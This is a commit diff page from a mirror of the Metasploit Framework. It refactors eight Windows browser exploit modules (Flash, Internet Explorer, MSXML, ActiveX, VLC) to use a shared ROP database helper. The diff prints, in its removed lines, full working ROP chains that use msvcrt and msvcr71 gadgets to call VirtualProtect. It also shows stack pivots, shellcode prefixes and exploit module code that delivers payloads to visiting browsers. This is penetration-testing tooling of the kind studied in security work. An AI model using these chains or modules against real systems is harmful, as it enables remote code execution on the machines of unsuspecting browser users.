infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'ropdb_for_browsers' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-ropdb_for_browsers

unstable
sinn3r 2012-10-05 15:43:18 -05:00
parent a60851e9d1 21ea77ff8b
commit 2aa59623d1
8 changed files with 40 additions and 375 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
View File

@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ autopwn_info({
:os_name => OperatingSystems::WINDOWS, :os_name => OperatingSystems::WINDOWS,
@ -127,10 +127,6 @@ class Metasploit3 < Msf::Exploit::Remote
return rand_text_alpha(n).unpack("V").first return rand_text_alpha(n).unpack("V").first
end end
def nop
return make_nops(4).unpack("V").first
end
def get_payload(t, cli) def get_payload(t, cli)
if t['Rop'].nil? if t['Rop'].nil?
@ -144,64 +140,14 @@ class Metasploit3 < Msf::Exploit::Remote
# No rop. Just return the payload. # No rop. Just return the payload.
return code if t['Rop'].nil? return code if t['Rop'].nil?
# Both ROP chains generated by mona.py - See corelan.be rop_name = (t['Rop'] and t['Rop'] == :msvcrt) ? 'msvcrt' : 'java'
case t['Rop'] rop_target = (rop_name == 'msvcrt') ? 'xp' : ''
when :msvcrt
print_status("Using msvcrt ROP")
exec_size = code.length
rop =
[
0x77c4e392, # POP EAX # RETN
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c,
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
exec_size, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
0x77c46101, # ROP NOP (-> edi)
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")
when :jre
print_status("Using JRE ROP")
exec_size = 0xffffffff - code.length + 1
rop =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
exec_size, # Value to NEG
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c351e05, # NEG EAX # RETN
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
].pack("V*")
end
pivot = [t['ppr']].pack('V*') #POP/POP/RET pivot = [t['ppr']].pack('V*') #POP/POP/RET
pivot << [junk].pack('V*') pivot << [junk].pack('V*')
pivot << [t.ret].pack('V*') pivot << [t.ret].pack('V*')
code = pivot + rop + code code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
return code return code
end end

42
modules/exploits/windows/browser/adobe_flash_rtmp.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ autopwn_info({
@ -122,53 +123,18 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def nop
return make_nops(4).unpack("V").first
end
def ret(t) def ret(t)
return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
end end
def popret(t)
return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
end
def get_rop_chain(t) def get_rop_chain(t)
# ROP chains generated by mona.py - See corelan.be
print_status("Using msvcrt ROP") print_status("Using msvcrt ROP")
rop = p = "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
[ p << payload.encoded
0x77c4e392, # POP EAX # RETN
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c,
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
0x00001000, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
0x77c46101, # ROP NOP (-> edi)
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")
code = ret(t) code = ret(t)
code << rand_text(119) code << rand_text(119)
code << rop code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
code << "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
code << payload.encoded
offset = 2616 - code.length offset = 2616 - code.length
code << rand_text(offset) code << rand_text(offset)
code << [ t['StackPivot'] ].pack("V") code << [ t['StackPivot'] ].pack("V")

35
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
View File

@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -182,40 +183,12 @@ class Metasploit3 < Msf::Exploit::Remote
end end
#Targets that don't need ROP #Targets that don't need ROP
rop = ''
pivot = "\xb8\x0c\x0c\x0c\x0c" #MOV EAX,0x0c0c0c0c pivot = "\xb8\x0c\x0c\x0c\x0c" #MOV EAX,0x0c0c0c0c
pivot << "\xff\xe0" #JMP EAX pivot << "\xff\xe0" #JMP EAX
pivot << "\x41" #Pad pivot << "\x41" #Pad
#Targets that need ROP #Targets that need ROP
if my_target['Rop'] if my_target['Rop']
#Target Addr=0x0c0c0c0c
rop =
[
0x7c376402, # POP EBP # RETN [msvcr71.dll]
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0xfffff800, # Value to negate, will become 0x00000201 (dwSize)
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c354901, # POP EBX # RETN [msvcr71.dll]
0xffffffff,
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c34b8d7, # POP EDI # RETN [msvcr71.dll]
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c364802, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
].pack("V*")
#Target Addr=0x11111110 #Target Addr=0x11111110
pivot = pivot =
[ [
@ -223,11 +196,15 @@ class Metasploit3 < Msf::Exploit::Remote
my_target['Pivot'], # ROP Pivot my_target['Pivot'], # ROP Pivot
0x7c346b52, # EAX (POP ESP; RETN) 0x7c346b52, # EAX (POP ESP; RETN)
].pack('V*') ].pack('V*')
#Target Addr=0x0c0c0c0c
p = generate_rop_payload('java', payload.encoded)
else
p = rop + payload.encoded
end end
arch = Rex::Arch.endian(my_target.arch) arch = Rex::Arch.endian(my_target.arch)
p = rop + payload.encoded
shellcode = Rex::Text.to_unescape(p, arch) shellcode = Rex::Text.to_unescape(p, arch)
pivot = Rex::Text.to_unescape(pivot, arch) pivot = Rex::Text.to_unescape(pivot, arch)

52
modules/exploits/windows/browser/ie_execcommand_uaf.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ autopwn_info({
:ua_name => HttpClients::IE, :ua_name => HttpClients::IE,
@ -138,31 +139,9 @@ class Metasploit3 < Msf::Exploit::Remote
0x77c4e392, # POP EAX # RETN 0x77c4e392, # POP EAX # RETN
0x77c15ed5, # XCHG EAX, ESP # RETN 0x77c15ed5, # XCHG EAX, ESP # RETN
].pack("V*") ].pack("V*")
rop = rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
[
0x77C21891, # POP ESI # RETN
0x0c0c0c04, # ESI
0x77c4e392, # POP EAX # RETN
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c, # XCHG EAX,ESI # ADD [EAX], AL # RETN
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
exec_size, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
0x77c46101, # ROP NOP (-> edi)
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")
when :jre else
print_status("Using JRE ROP") print_status("Using JRE ROP")
exec_size = 0xffffffff - code.length + 1 exec_size = 0xffffffff - code.length + 1
if t['Random'] if t['Random']
@ -179,31 +158,10 @@ class Metasploit3 < Msf::Exploit::Remote
0x7c348b05 # XCHG EAX, ESP # RET 0x7c348b05 # XCHG EAX, ESP # RET
].pack("V*") ].pack("V*")
end end
rop = rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
exec_size, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c351e05, # NEG EAX # RETN
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
].pack("V*")
end end
code = stack_pivot + rop + code return rop_payload
return code
end end
# Spray published by corelanc0d3r # Spray published by corelanc0d3r

65
modules/exploits/windows/browser/ms12_037_same_id.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -105,14 +106,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def nop
return make_nops(4).unpack("V").first
end
def ret(t) def ret(t)
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
@ -132,63 +125,21 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def get_rop_chain(t) def get_rop_chain(t)
pivot = ret(t) * 27
pivot << popret(t)
pivot << [t.ret].pack("V") # stackpivot
adjust = ret(t) * 27
adjust << popret(t)
adjust << [t.ret].pack("V") # stackpivot
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
print_status("Using msvcrt ROP") print_status("Using msvcrt ROP")
rop = rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
[
0x77c4e392, # POP EAX # RETN
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c,
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
0x00001000, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
0x77c46101, # ROP NOP (-> edi)
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")
when :jre else
print_status("Using JRE ROP") print_status("Using JRE ROP")
rop = rop = generate_rop_payload('java', '', {'pivot'=>pivot})
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0x00001000, # (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0x00000040, # flNewProtect
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
].pack("V*")
end end
code = adjust return rop
code << rop
return code
end end

58
modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ autopwn_info({
:ua_name => HttpClients::IE, :ua_name => HttpClients::IE,
@ -153,14 +154,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def nop
return make_nops(4).unpack("V").first
end
def ret(t) def ret(t)
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
@ -180,7 +173,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def get_rop_chain(t) def get_rop_chain(t)
if t['RandomHeap'] if t['RandomHeap']
adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c
adjust << ret(t) adjust << ret(t)
@ -196,54 +188,14 @@ class Metasploit3 < Msf::Exploit::Remote
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
print_status("Using msvcrt ROP") print_status("Using msvcrt ROP")
rop = rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
[
0x77c4e392, # POP EAX # RETN
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c,
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
0x00001000, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
0x77c46101, # ROP NOP (-> edi)
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")
when :jre else
print_status("Using JRE ROP") print_status("Using JRE ROP")
rop = rop = generate_rop_payload('java','',{'pivot'=>adjust})
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0x00001000, # (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0x00000040, # flNewProtect
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
].pack("V*")
end end
code = adjust return rop
code << rop
return code
end end
def get_easy_spray(t, js_code, js_nops) def get_easy_spray(t, js_code, js_nops)

60
modules/exploits/windows/browser/ntr_activex_check_bof.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ autopwn_info({
@ -257,14 +258,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def get_payload(t, cli) def get_payload(t, cli)
code = payload.encoded code = payload.encoded
@ -275,57 +268,14 @@ class Metasploit3 < Msf::Exploit::Remote
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
print_status("Using msvcrt ROP") print_status("Using msvcrt ROP")
exec_size = code.length rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
rop = [
0x77C21891, # POP ESI # RETN
0x0c0c0c04, # ESI
0x77c4e392, # POP EAX # RETN
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c, # XCHG EAX,ESI # ADD [EAX], AL # RETN
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
exec_size, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
0x77c46101, # ROP NOP (-> edi)
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")
when :jre else
print_status("Using JRE ROP") print_status("Using JRE ROP")
exec_size = 0xffffffff - code.length + 1 rop_payload = generate_rop_payload('java', code)
rop = [
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
exec_size, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c351e05, # NEG EAX # RETN
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
].pack("V*")
end end
code = rop + code return rop_payload
return code
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)

39
modules/exploits/windows/browser/vlc_amv.rb
View File

@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -146,43 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
#Generate our payload #Generate our payload
if my_target['Rop'] if my_target['Rop']
#IE 8 targets #IE 8 targets
#mona.py tekniq! + Payload code = generate_rop_payload('java', payload.encoded)
code = [
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # Make EAX readable
0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
0x7c348b06, # EBP (NOP)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # <- VirtualProtect() found in IAT
0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
0x7c346c0b, # Slide, so next gadget would write to correct stack location
0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
0x7c348b06, # EDI (filler)
0x7c348b06, # will be patched at runtime (VP), then picked up into ESI
0x7c348b06, # EBX (filler)
0x7c376402, # POP EBP # RETN (msvcr71.dll)
0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0xfffff82f, # size 20001 bytes
0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
0x7c354901, # POP EBX # RETN (MSVCR71.dll)
0xffffffff, # pop value into ebx
0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
0x7c34b8d8, # ROP NOP (-> edi)
0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x90909090, # NOPS (-> eax)
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
].pack('V*')
#Append payload after the ROP chain
code << payload.encoded
#Align and 'jump' to our final payload at 0x0c0c0c0c #Align and 'jump' to our final payload at 0x0c0c0c0c
ini_stage = [ ini_stage = [